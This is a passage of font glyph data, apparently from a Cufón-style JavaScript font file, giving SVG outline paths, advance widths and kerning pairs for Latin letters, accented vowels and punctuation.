58v38,-18,147,-59,154,-81v55,-90,332,-646,428,-839v36,-73,79,-147,104,-227v0,-14,-15,-19,-26,-19v-59,-1,-104,8,-158,-6v-2,-30,-1,-34,2,-67v132,-10,308,5,450,3r619,-9v72,0,123,1,152,2r36,318r-82,0v-58,-122,-55,-146,-115,-197v-80,-28,-231,-28,-344,-28v-43,0,-80,4,-110,12v-6,104,-2,415,1,482v119,-6,291,5,380,-22v41,-23,39,-46,56,-119v8,-34,12,-58,15,-69v27,0,46,-2,73,1r-2,480v-29,-5,-48,4,-78,-2v-35,-195,-26,-183,-269,-183v-69,0,-128,1,-175,2r4,514v67,24,96,22,187,22v209,0,321,-68,409,-197v18,-26,32,-44,43,-54v65,2,65,11,52,76r-52,262r-744,-11v-65,0,-193,4,-383,11v-4,-28,-4,-40,-1,-70r180,-23v13,-3,22,-7,25,-13v18,-114,6,-354,3,-512v-149,-3,-309,3,-341,10r-215,479v7,53,105,41,173,70xm446,-699v101,9,283,1,297,-2v1,-38,2,-77,2,-117v0,-135,-2,-266,-7,-395r-27,0r-186,354v-45,85,-71,139,-79,160","w":1877},{"d":"892,-167v-104,112,-206,181,-394,184v-227,3,-338,-113,-401,-274v-38,-98,-32,-183,-11,-279v29,-131,94,-177,166,-241v112,-100,351,-105,470,-24v100,68,163,145,169,304r-111,-2v-22,2,-215,-13,-282,-13r-194,1v-10,174,64,314,194,361r58,19v152,1,185,-24,276,-83v24,17,44,33,60,47xm537,-574v34,1,93,-9,130,-5v-1,-116,-66,-215,-176,-215v-103,0,-179,104,-182,219xm669,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm208,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124"},{"d":"258,-137v17,-49,8,-105,7,-163r-3,-281r-11,-317v-5,-151,-8,-232,-11,-244v-12,-43,-31,-60,-81,-69v-55,-9,-92,-17,-110,-23r-1,-76r239,15r146,-1v112,1,373,-22,474,2v134,32,201,81,255,190v147,295,-115,619,-456,528v-35,-9,-67,-23,-98,-42v-3,-19,-5,-46,-5,-80v185,26,298,-60,298,-241v0,-178,-85,-277,-257,-275v-50,0,-86,7,-107,22v-5,9,-9,17,-12,25r7,471r3,336v0,89,-7,156,4,245r199,25v6,36,5,44,-1,80v-99,13,-224,-11,-351,-11v-108,0,-194,13,-296,21v-4,-35,-5,-39,-2,-71v58,-19,125,-38,170,-66","w":1259,"k":{"\u00e5":57,"\u00c5":150,"\u00c4":150,"o":39,"e":39,"a":57,"A":150,".":301,",":283}},{"d":"-12,-1501r1048,0r0,103r-1048,0r0,-103","w":1024},{"d":"817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81xm384,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":981},{"d":"136,-965r1094,0r0,157r-1094,0r0,-157xm136,-494r1094,0r0,158r-1094,0r0,-158","w":1365},{"d":"658,-4v-141,-23,-411,-25,-576,-2r0,-72v37,-11,138,-33,163,-50v27,-44,17,-134,17,-204r1,-282v5,-132,7,-200,7,-204r-2,-133v6,-70,-3,-140,-3,-211v-1,-7,-3,-17,-7,-32v-28,-16,-109,-22,-168,-27r-3,-88r352,14v39,2,225,-10,281,-14v2,31,1,43,-1,76v-47,18,-131,34,-176,52v-8,29,-3,110,-3,145v0,113,-3,199,-3,260r1,264r-3,134r1,238v0,5,1,13,4,23v74,15,92,15,172,26v5,37,5,46,3,84xm594,-1437v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm133,-1560v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":811},{"d":"632,-810v110,0,221,1,331,-10v2,27,3,33,1,56v-36,20,-106,17,-123,51v-31,64,-101,263,-141,359r-167,398v-64,134,-113,291,-204,395v-67,76,-284,59,-284,-53v0,-37,16,-71,47,-102v71,-47,98,-28,167,21v32,22,54,37,72,4v60,-111,95,-193,112,-240r-185,-407v-69,-163,-124,-277,-159,-343v-35,-66,-43,-62,-105,-87r-9,-44v94,-15,183,7,285,1r142,-8v5,4,10,8,14,13v-2,29,-4,48,-5,56r-81,14v-30,5,-8,39,-5,54r48,98v55,138,113,249,173,373v9,-30,184,-447,173,-470v0,-7,-2,-18,-6,-33v-32,-32,-77,-22,-133,-39v-4,-20,-6,-31,-1,-55v20,-1,34,-2,43,-2xm699,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm238,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124"},{"d":"-119,319v0,-68,57,-124,123,-123v32,0,67,18,98,59v40,54,46,88,98,96v67,-8,62,-109,62,-195v-1,-86,4,-124,4,-218r-2,-450r-4,-125r1,-217r-5,-184v-5,-38,-5,-137,-6,-159v-11,-6,-151,-15,-204,-22r-5,-86v65,0,121,3,168,7v128,12,306,-9,447,-9v11,0,28,1,50,4v3,35,3,39,-1,75v-83,14,-120,6,-175,19r8,475r-2,101r3,102r1,182v-1,250,-9,399,-79,545v-66,139,-143,209,-258,258v-49,21,-100,28,-149,28v-88,0,-173,-77,-173,-163","w":768,"k":{"\u00fc":57,"\u00f6":76,"\u00e5":94,"\u00e4":94,"\u00c5":39,"\u00c4":39,"y":39,"u":57,"o":76,"e":76,"a":94,"A":39,";":20,":":20,".":39,",":39}},{"d":"135,-990r1096,0r0,644r-157,0r0,-487r-939,0r0,-157","w":1365},{"d":"273,-1332v339,0,604,326,457,652v-52,115,-142,147,-290,177v-92,18,-93,20,-111,112r-99,0r-39,-334v8,-63,130,-41,203,-43v169,-4,255,-34,263,-171v6,-104,-97,-203,-196,-203v-49,0,-189,57,-243,57v-74,0,-120,-38,-119,-110v2,-94,65,-137,174,-137xm145,-124v0,-76,69,-142,144,-142v83,0,145,62,145,144v0,78,-67,141,-145,141v-78,0,-144,-65,-144,-143","w":853},{"d":"658,-4v-141,-23,-411,-25,-576,-2r0,-72v37,-11,138,-33,163,-50v27,-44,17,-134,17,-204r1,-282v5,-132,7,-200,7,-204r-2,-133v6,-70,-3,-140,-3,-211v-1,-7,-3,-17,-7,-32v-28,-16,-109,-22,-168,-27r-3,-88r352,14v39,2,225,-10,281,-14v2,31,1,43,-1,76v-47,18,-131,34,-176,52v-8,29,-3,110,-3,145v0,113,-3,199,-3,260r1,264r-3,134r1,238v0,5,1,13,4,23v74,15,92,15,172,26v5,37,5,46,3,84xm299,-1395v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":811},{"d":"993,-630v105,0,167,-76,177,-182r58,0v0,226,-158,375,-382,307v-42,-3,-382,-168,-473,-164v-109,5,-161,70,-177,179r-58,0v2,-227,141,-363,365,-309v94,23,390,169,490,169","w":1365},{"d":"802,-1571v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm234,-988v-7,-214,26,-226,-153,-226v-17,0,-31,-1,-42,-3r-3,-79v72,-5,264,10,297,9r373,-10v-2,25,1,52,1,79v-37,5,-76,8,-116,8v-95,0,-82,17,-86,141r2,88v-2,60,4,118,4,174v0,145,1,285,9,424v7,128,49,217,138,264v167,88,419,29,497,-86v62,-91,67,-144,69,-308v2,-172,-30,-390,-30,-598v0,-116,-83,-115,-188,-108r-13,-3r2,-76r79,0v123,6,255,13,374,-1r17,2v6,38,9,43,2,73v-34,13,-138,17,-152,28v-9,8,-14,20,-14,37v1,44,4,75,6,139r7,242v8,202,29,476,-42,585v-93,141,-270,223,-513,220v-278,-4,-471,-89,-511,-326v-31,-184,-7,-472,-14,-689","w":1557},{"d":"419,-737v-2,80,-62,172,-156,150v-65,0,-130,-73,-128,-144v1,-76,65,-139,151,-139v61,0,135,72,133,133xm254,-276v156,5,250,209,182,382v-40,102,-74,133,-147,197v-3,2,-38,21,-103,56v-56,16,-62,-11,-83,-66v3,-9,11,-16,26,-23v75,-35,146,-100,150,-191v0,-18,-5,-33,-15,-44v-10,-11,-40,-30,-90,-57v-50,-27,-75,-66,-75,-117v0,-84,65,-139,155,-137","w":533},{"d":"1397,-1288r71,-1v4,16,1,42,-3,58v-115,38,-127,23,-169,91v-35,57,-95,181,-185,368r201,470r302,-779v9,-38,36,-72,27,-117v-39,-14,-64,-15,-93,-32v-2,-39,-8,-38,4,-62v86,-3,179,9,265,-2r21,3v5,34,7,67,-24,73v-60,33,-59,31,-87,105v-58,156,-117,306,-179,451v-62,145,-154,375,-276,691r-101,1v-55,-154,-109,-259,-167,-399v-18,-43,-33,-74,-44,-95r-8,-14v-1,3,-37,70,-106,200v-69,130,-119,233,-151,306r-102,1v-24,-73,-75,-184,-141,-338r-323,-756v-34,-77,-58,-122,-73,-137v-8,-9,-36,-20,-53,-26r-5,-62v8,-5,14,-7,19,-7v140,9,281,12,424,1v18,10,1,38,1,57v-34,25,-105,38,-67,90r112,279r259,604v34,-63,87,-170,159,-320r-147,-352r-88,-203v-11,-19,-24,-49,-47,-61v-15,-7,-47,-19,-100,-32r4,-60v38,-1,170,9,192,9r140,-2r187,-9v-1,22,5,44,-3,62v-24,11,-103,1,-101,41v2,43,27,84,45,131v32,86,59,148,77,187r70,-145v36,-82,59,-110,66,-170v-28,-30,-49,-26,-107,-44v-3,-29,-3,-33,1,-62","w":1835,"k":{"\u00e5":133,"\u00d6":57,"\u00c5":23,"\u00c4":23,"y":20,"u":57,"r":76,"o":115,"i":20,"h":-37,"e":115,"d":94,"a":133,"O":57,"G":57,"C":57,"A":23,";":57,":":57,".":170,"-":94,",":152}},{"d":"66,-746r327,-134r-326,-145v21,-39,54,-94,98,-164v48,32,171,136,217,168v25,17,48,32,65,47v-5,-59,-16,-92,-19,-160v-1,-19,-8,-84,-20,-196r199,0r-54,351v61,-46,108,-80,139,-101r117,-82v12,-11,22,-20,31,-26v25,41,56,97,95,168v-18,9,-51,22,-97,41v-46,19,-118,51,-217,96v87,47,237,93,316,143v-7,12,-17,32,-31,60v-25,50,-45,85,-60,106v-17,-11,-47,-33,-91,-67v-44,-34,-112,-81,-203,-142r47,346r-196,-1r44,-347r-284,209v-37,-74,-70,-131,-97,-170","w":1003},{"d":"892,-167v-104,112,-206,181,-394,184v-227,3,-338,-113,-401,-274v-38,-98,-32,-183,-11,-279v29,-131,94,-177,166,-241v112,-100,351,-105,470,-24v100,68,163,145,169,304r-111,-2v-22,2,-215,-13,-282,-13r-194,1v-10,174,64,314,194,361r58,19v152,1,185,-24,276,-83v24,17,44,33,60,47xm537,-574v34,1,93,-9,130,-5v-1,-116,-66,-215,-176,-215v-103,0,-179,104,-182,219xm260,-1280r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3"},{"d":"234,-10v-66,6,-121,1,-186,0v-2,-24,-3,-51,-3,-80v42,-64,274,-361,387,-511v32,-43,70,-97,120,-159v50,-62,112,-147,191,-253r139,-186v-174,-7,-470,7,-595,48v-75,24,-132,101,-164,151v-46,5,-37,8,-69,1v4,-26,33,-142,88,-349r60,-4v40,92,36,93,143,93v53,0,182,-11,386,-20v130,-6,231,-9,303,-9r203,1v1,15,2,28,3,41v-31,54,-145,209,-192,271r-279,366r-215,287v-60,79,-111,148,-152,207v177,18,467,31,590,-38v101,-57,127,-102,208,-220r71,-3r-32,372r-481,-13r-250,-1","w":1365},{"d":"340,-14v-94,0,-204,22,-280,14r2,-72r175,-38r19,-12v24,-124,-2,-273,7,-416r-4,-143r2,-170r-12,-335v-21,-18,-129,-32,-179,-50r0,-70r132,5v263,21,690,9,974,-6v13,79,23,165,23,248v0,20,-2,35,-6,46v-68,8,-82,11,-108,-49v-60,-140,-42,-133,-236,-138r-138,4v-79,3,-122,1,-171,20v-23,43,-8,118,-10,178r-3,136v0,69,2,112,7,128v20,14,56,7,86,8v103,3,228,4,313,-25v47,-37,42,-58,50,-160v36,-1,48,-4,90,1r-10,248v4,30,3,104,2,200v-33,6,-30,5,-69,-2v-17,-36,-43,-145,-70,-147v-18,-18,-262,-33,-388,-17v-15,120,-2,267,-2,397v0,116,10,115,113,128v42,5,72,11,106,19v5,35,5,44,1,78r-192,-7v-16,-1,-91,-1,-224,-1","w":1259,"k":{"\u00f6":57,"\u00e5":76,"\u00e4":76,"\u00c5":150,"\u00c4":150,"r":39,"o":57,"l":-37,"e":57,"a":76,"A":150,".":264,",":248}},{"d":"1075,-609r6,197r-71,0v-9,-36,-37,-174,-51,-182v-41,-43,-60,-34,-188,-34v-101,0,-176,3,-227,8r3,232r-2,216v0,25,9,43,27,52v52,27,393,27,487,0v123,-35,182,-130,231,-255v37,-3,47,-4,84,-2r-11,72r-37,189r-18,114v-221,11,-514,-23,-814,-14r-458,14r0,-69v50,-10,197,-23,220,-43v17,-41,11,-101,11,-162r-2,-490r-5,-160v3,-90,-2,-175,-10,-257v-51,-32,-142,-29,-214,-38r5,-80v177,15,246,26,467,14v149,-8,283,-9,403,-9v141,-1,213,-8,361,13v12,13,18,31,18,54r1,265v-30,1,-40,3,-75,0v-33,-79,-71,-157,-128,-222v-144,-24,-378,-24,-543,-17v-6,82,0,369,-1,491v158,6,307,6,392,-24v47,-46,37,-67,67,-190v22,-2,47,0,71,0v7,129,-3,198,1,317xm619,-1395v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1451},{"d":"877,-1607v56,0,66,-30,81,-89r58,1v3,150,-79,256,-209,263v-107,6,-213,-86,-308,-86v-59,0,-71,28,-87,84r-59,1v-12,-140,84,-257,205,-261v116,-4,213,87,319,87xm404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388","w":1344},{"d":"349,26r887,-1362v33,-8,78,4,114,0r-888,1362v-43,3,-75,-7,-113,0xm242,-1307v199,-81,348,112,343,325v-4,159,-55,272,-153,332v-65,40,-162,30,-216,4v-112,-53,-180,-247,-141,-424v31,-138,70,-197,167,-237xm320,-680v111,-10,90,-203,90,-328v0,-115,12,-257,-83,-257v-56,0,-72,39,-82,107v-9,61,-8,392,10,427v18,19,28,54,65,51xm1296,-672v199,-81,348,112,343,324v-4,160,-55,271,-153,332v-65,40,-161,30,-216,4v-112,-53,-180,-247,-141,-423v31,-140,68,-197,167,-237xm1374,-46v111,-10,90,-201,90,-328v0,-115,12,-257,-83,-257v-56,0,-73,39,-83,107v-9,62,-7,392,11,427v18,19,28,54,65,51","w":1707},{"d":"136,-1181r1094,459r0,142r-1094,459r0,-170r881,-359r-881,-360r0,-171","w":1365},{"d":"419,-737v-2,80,-62,172,-156,150v-65,0,-130,-73,-128,-144v1,-76,65,-139,151,-139v61,0,135,72,133,133xm254,-276v156,5,250,209,182,382v-40,102,-74,133,-147,197v-3,2,-38,21,-103,56v-56,16,-62,-11,-83,-66v3,-9,11,-16,26,-23v75,-35,146,-100,150,-191v0,-18,-5,-33,-15,-44v-10,-11,-40,-30,-90,-57v-50,-27,-75,-66,-75,-117v0,-84,65,-139,155,-137","w":533},{"d":"326,-1320v181,0,303,160,191,300v-30,38,-131,128,-306,268r212,0v76,6,75,-25,98,-76v0,0,54,-9,68,3v1,43,-7,72,-26,189r-240,-2r-275,2r0,-42v88,-99,118,-114,189,-191v61,-66,146,-129,152,-242v4,-80,-41,-126,-116,-126v-78,0,-121,53,-128,133r-66,0v-2,-17,-3,-32,-3,-43v5,-100,123,-173,250,-173","w":640},{"d":"134,-728r468,0r0,-470r158,0r0,470r471,0r0,158r-471,0r0,466r-158,0r0,-466r-468,0r0,-158","w":1365},{"d":"808,-1387v85,0,146,71,146,142v0,158,-87,367,-122,524r-50,0r-101,-384v-16,-58,-24,-104,-24,-138v-2,-75,73,-144,151,-144xm324,-1387v80,0,155,64,148,144v-14,167,-87,361,-123,522r-49,0r-104,-385v-13,-50,-20,-95,-20,-134v0,-78,69,-147,148,-147","w":1131},{"d":"604,-1310v212,-51,487,-10,622,90r96,-112v18,7,54,32,81,49v-27,40,-67,81,-98,119v120,107,218,269,219,482v0,211,-55,318,-146,440v-113,152,-325,254,-567,254v-173,0,-319,-25,-422,-103r-93,106r-83,-52r97,-113v-131,-121,-163,-198,-210,-378v-8,-30,-11,-148,-9,-216v0,-43,18,-111,57,-204v75,-176,255,-314,456,-362xm1097,-1075v-58,-88,-171,-157,-314,-157v-207,0,-305,154,-346,300v-44,157,-36,454,32,592v23,-24,53,-57,88,-100xm515,-237v88,126,219,193,410,139v67,-19,152,-82,186,-138v64,-105,92,-227,92,-401v0,-125,-12,-201,-32,-280v-5,-25,-14,-44,-27,-58","w":1621},{"d":"566,-576v-78,0,-140,-63,-140,-140v0,-82,63,-147,143,-147v79,0,147,67,147,145v0,80,-67,142,-150,142xm576,490v-312,0,-588,-296,-461,-625v51,-133,132,-180,302,-205v98,-15,96,-28,114,-111v33,1,72,-6,100,1v3,16,6,50,9,102v5,98,25,151,25,231v0,41,-45,42,-82,42v-190,0,-385,-10,-385,179v0,92,103,194,196,194v82,0,157,-55,241,-55v78,0,121,36,121,110v0,97,-67,137,-180,137","w":853},{"d":"70,-957v6,-81,23,-240,34,-327v27,0,68,-4,125,-3r245,5r367,-4v9,0,21,1,38,2v9,94,2,86,-38,201r-132,381r-214,587v-7,15,-10,26,-10,34v0,21,43,41,43,62v0,13,-6,26,-17,40r-222,0v2,-20,16,-56,41,-109v15,-31,47,-113,97,-245r272,-712v-65,-3,-118,-5,-159,-5r-149,2v-62,1,-160,-11,-195,14v-26,12,-28,91,-48,106v-22,17,-81,16,-78,-29"},{"d":"914,-618v101,-1,163,12,250,10r225,-4v8,-1,30,0,67,2v0,0,5,47,-6,69v-11,9,-95,37,-104,45v-22,33,-14,50,-14,144v0,79,0,126,-1,141v-7,78,3,94,-14,130v-177,108,-710,143,-916,14v-178,-111,-307,-304,-307,-572v0,-414,290,-686,731,-686v94,0,209,9,293,35v70,22,129,45,176,73v7,52,39,221,18,276v-29,-1,-53,-3,-73,-8v-98,-151,-112,-181,-256,-242v-172,-73,-333,-18,-448,121v-83,101,-127,249,-127,446v0,292,137,550,431,550v86,0,207,-6,219,-97v7,-55,9,-251,5,-308v-14,-28,-15,-20,-54,-34v-38,-13,-99,-20,-125,-41v-4,-25,-2,-31,5,-58v12,-4,20,-6,25,-6","w":1493,"k":{".":-20,",":-20}},{"d":"406,-844v0,-66,-43,-122,-99,-124v-19,0,-44,9,-75,27r-40,-42v75,-47,122,-85,147,-111v47,-50,10,-131,-55,-131v-45,0,-87,27,-127,80r-55,-26v48,-98,118,-145,234,-149v104,-4,182,42,182,124v0,80,-48,103,-117,151v99,11,177,77,177,174v0,157,-144,251,-327,251v-77,0,-134,-14,-173,-36v-64,-35,-32,-105,37,-105v35,0,69,19,100,56v18,22,40,33,67,33v82,0,124,-80,124,-172","w":640},{"d":"287,-1387v80,0,151,65,149,146v0,29,-8,75,-24,136r-99,383r-48,0r-105,-382v-13,-47,-20,-92,-20,-133v0,-81,67,-150,147,-150","w":576},{"d":"892,-167v-104,112,-206,181,-394,184v-227,3,-338,-113,-401,-274v-38,-98,-32,-183,-11,-279v29,-131,94,-177,166,-241v112,-100,351,-105,470,-24v100,68,163,145,169,304r-111,-2v-22,2,-215,-13,-282,-13r-194,1v-10,174,64,314,194,361r58,19v152,1,185,-24,276,-83v24,17,44,33,60,47xm537,-574v34,1,93,-9,130,-5v-1,-116,-66,-215,-176,-215v-103,0,-179,104,-182,219","k":{"b":41}},{"d":"533,-142v53,30,155,38,207,64v0,33,-1,57,-4,74v-29,-2,-40,1,-65,1v-144,0,-228,-21,-255,-19r-290,17r-43,0v-3,-34,-3,-32,1,-63v38,-22,125,-22,169,-42v20,-111,-1,-326,11,-468r-2,-93r5,-258v0,-139,-2,-227,-5,-266v-40,-13,-142,-17,-167,-22v1,-24,-6,-53,2,-71v90,-19,225,-2,316,-6r125,-6v78,-8,160,-12,247,-12v238,0,447,141,447,344v0,165,-115,264,-267,308r100,151r160,259v76,116,47,118,155,159v30,11,53,23,69,34v7,20,7,29,5,53v-77,2,-135,-9,-219,-11v-77,-1,-137,0,-213,11r-93,-178v-29,-65,-76,-170,-151,-309v-62,-114,-42,-124,-173,-132v-13,0,-36,1,-68,2v-7,90,4,197,1,291xm916,-937v0,-192,-85,-275,-299,-275v-31,0,-57,2,-79,5r-4,492v220,16,382,-35,382,-222","w":1429,"k":{"\u00fc":39,"\u00f6":20,"\u00e5":-20,"\u00e4":-20,"\u00dc":39,"\u00d6":39,"y":20,"w":20,"v":41,"u":39,"o":20,"e":20,"a":-20,"Y":76,"W":20,"V":76,"U":39,"T":39,"Q":39,"O":39,"G":39,"C":39}},{"d":"28,431v207,-200,322,-451,320,-861v-1,-180,-20,-311,-66,-466v-42,-140,-146,-268,-258,-379v12,-21,32,-31,47,-51v230,139,402,364,486,609v96,281,32,605,-87,802v-81,133,-263,321,-384,400","w":725},{"d":"111,-490v-57,-217,11,-469,125,-594v127,-139,308,-243,573,-243v282,0,487,118,602,289v183,273,128,621,-79,848v-182,200,-589,270,-877,140v-140,-63,-215,-150,-287,-274v-17,-31,-36,-86,-57,-166xm796,-78v288,-9,407,-220,405,-537v0,-64,-7,-199,-26,-277v-49,-200,-175,-336,-404,-336v-199,0,-294,151,-336,312v-36,137,-30,391,10,511v54,162,55,170,150,258v37,34,128,71,201,69xm704,-1395v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1621},{"d":"-2,-1020v22,-36,78,-234,109,-337r62,0r10,16v19,32,33,53,43,63v175,11,448,1,641,1v122,0,261,9,368,-9v12,-6,29,-51,39,-73r74,0r1,348v0,17,-1,32,-4,45v-27,9,-51,14,-72,16v-24,-26,-76,-171,-95,-195v-7,-9,-17,-14,-28,-17v-4,-3,-199,-10,-282,-1v-14,152,-6,324,-5,492r3,447v0,46,4,81,12,104v41,14,129,22,186,45v5,42,7,37,2,70v-197,4,-237,-18,-472,-14v-6,-2,-195,15,-250,16r-3,-54v31,-47,196,-63,227,-88v7,-13,11,-29,12,-50v11,-220,9,-708,-4,-949v-1,-12,-8,-17,-21,-19v-14,-2,-292,-12,-328,14v-27,20,-72,62,-129,136v-17,21,-29,32,-37,32v-31,-16,-50,-29,-59,-39","w":1408,"k":{"\u00e5":170,"\u00d6":39,"\u00c5":152,"\u00c4":152,"z":133,"y":57,"w":76,"u":76,"s":170,"r":115,"o":190,"m":76,"l":-20,"h":-20,"e":170,"c":190,"a":170,"Q":39,"O":39,"G":39,"C":39,"A":152,";":94,":":94,".":133,"-":115,",":115}},{"d":"658,-4v-141,-23,-411,-25,-576,-2r0,-72v37,-11,138,-33,163,-50v27,-44,17,-134,17,-204r1,-282v5,-132,7,-200,7,-204r-2,-133v6,-70,-3,-140,-3,-211v-1,-7,-3,-17,-7,-32v-28,-16,-109,-22,-168,-27r-3,-88r352,14v39,2,225,-10,281,-14v2,31,1,43,-1,76v-47,18,-131,34,-176,52v-8,29,-3,110,-3,145v0,113,-3,199,-3,260r1,264r-3,134r1,238v0,5,1,13,4,23v74,15,92,15,172,26v5,37,5,46,3,84","w":811},{"d":"1230,-121r-1094,-459r0,-142r1094,-459r0,170r-881,359r881,361r0,170","w":1365},{"w":512},{"d":"645,-416v-23,-29,-180,-303,-225,-396v34,-2,70,0,109,1v8,10,343,342,381,395r-239,249r-142,142r-109,-3v77,-153,146,-247,225,-388xm35,-812r99,1r119,134r238,258v-20,26,-271,293,-357,393r-97,-3r185,-388v-102,-192,-164,-324,-187,-395","w":939},{"d":"1003,-963v93,0,128,59,142,157r34,-119r244,-10r-183,628v-21,69,-31,122,-31,158v0,39,40,77,80,77v47,0,106,-28,179,-80v137,-97,253,-312,253,-541v0,-365,-270,-637,-640,-631v-366,6,-629,189,-766,451v-77,147,-118,304,-118,472v0,451,334,787,782,787v395,0,714,-245,820,-551r61,0v-140,353,-431,599,-883,607v-502,9,-897,-379,-885,-878v13,-568,391,-946,968,-951v434,-4,709,260,718,675v6,275,-141,527,-312,630v-89,54,-185,82,-288,82v-121,0,-201,-64,-203,-173v0,-38,8,-86,24,-143v-94,155,-132,227,-253,294v-135,75,-268,-36,-260,-199v16,-337,190,-586,411,-714v33,-19,69,-28,106,-28xm1099,-761v0,-89,-53,-172,-123,-109v-108,97,-222,396,-232,596v-2,47,24,91,59,91v19,0,43,-17,77,-47v101,-90,219,-347,219,-531","w":1899},{"d":"1075,-609r6,197r-71,0v-9,-36,-37,-174,-51,-182v-41,-43,-60,-34,-188,-34v-101,0,-176,3,-227,8r3,232r-2,216v0,25,9,43,27,52v52,27,393,27,487,0v123,-35,182,-130,231,-255v37,-3,47,-4,84,-2r-11,72r-37,189r-18,114v-221,11,-514,-23,-814,-14r-458,14r0,-69v50,-10,197,-23,220,-43v17,-41,11,-101,11,-162r-2,-490r-5,-160v3,-90,-2,-175,-10,-257v-51,-32,-142,-29,-214,-38r5,-80v177,15,246,26,467,14v149,-8,283,-9,403,-9v141,-1,213,-8,361,13v12,13,18,31,18,54r1,265v-30,1,-40,3,-75,0v-33,-79,-71,-157,-128,-222v-144,-24,-378,-24,-543,-17v-6,82,0,369,-1,491v158,6,307,6,392,-24v47,-46,37,-67,67,-190v22,-2,47,0,71,0v7,129,-3,198,1,317","w":1451},{"d":"-9,-821r293,5r155,-5v9,29,7,33,2,66v-37,8,-109,6,-114,35v7,43,20,48,41,107v6,16,17,40,33,72v50,103,86,184,107,241v13,34,23,59,31,75v47,-107,97,-244,151,-410v14,-43,22,-78,24,-105v-50,-9,-92,-7,-138,-11v-3,-25,-4,-55,6,-70v110,-10,233,8,345,-2v7,0,16,0,28,1v1,25,1,33,0,57v-68,16,-115,31,-141,45r-13,28v-59,171,-186,459,-266,647r-29,59r-81,0v-121,-225,-215,-482,-331,-722v-5,-11,-10,-18,-13,-21v-54,-15,-85,-26,-93,-34v-3,-17,-3,-45,3,-58","w":939,"k":{"\u00f6":53,"\u00e5":53,"\u00e4":53,"q":70,"o":53,"e":35,"d":53,"c":53,"a":53,".":211,",":190}},{"d":"387,-717v93,-83,185,-132,320,-137v118,-5,230,71,258,154v36,107,18,408,18,572v0,15,3,28,8,38v12,10,76,18,104,24v12,17,9,36,8,65v-85,-4,-166,-12,-254,-12v-76,0,-137,11,-212,10v-2,-23,-1,-36,1,-59v17,-6,119,-6,126,-33v22,-88,4,-213,7,-310v4,-141,-9,-228,-26,-263v-43,-90,-140,-89,-230,-46v-40,19,-81,47,-124,86v-4,46,-2,98,-1,147r4,160v-5,86,2,207,11,209v9,14,42,29,99,46v5,29,4,31,-4,62v-162,-2,-262,-14,-456,0v-6,-18,-4,-25,-3,-53v44,-26,125,-12,132,-53v19,-110,4,-285,4,-414v0,-64,5,-107,-35,-133v-19,-13,-50,-26,-95,-39r-1,-48v80,-19,172,-41,218,-82v18,-16,44,-38,72,-73r53,-4","w":1131,"k":{"\u00fc":20,"y":35,"v":35,"u":20}},{"d":"272,17v-111,5,-186,-123,-126,-219v17,-27,55,-69,119,-69v77,0,150,60,150,131v0,101,-66,153,-143,157","w":533},{"d":"510,-4v-109,-12,-325,-9,-455,-1r-1,-57v9,-8,128,-36,133,-46v27,-61,16,-161,14,-216r-6,-172r-3,-211v-44,-3,-95,3,-133,-6v-1,-40,-5,-66,13,-88v20,0,59,-2,118,-7v6,-237,107,-432,276,-498v37,-15,80,-23,131,-23v119,-2,205,51,208,155v2,73,-96,143,-165,87v-23,-12,-72,-110,-93,-123v-61,-37,-119,19,-128,81v-7,49,-11,232,-9,319v55,4,112,-7,166,1v24,19,10,51,9,89v-48,15,-119,-3,-174,9r2,489v-14,153,52,126,169,156v5,33,5,32,0,62r-72,0","w":619,"k":{"o":-20,"l":-92,"k":-66,"f":-37,"a":-20,"?":-276,"!":-258," 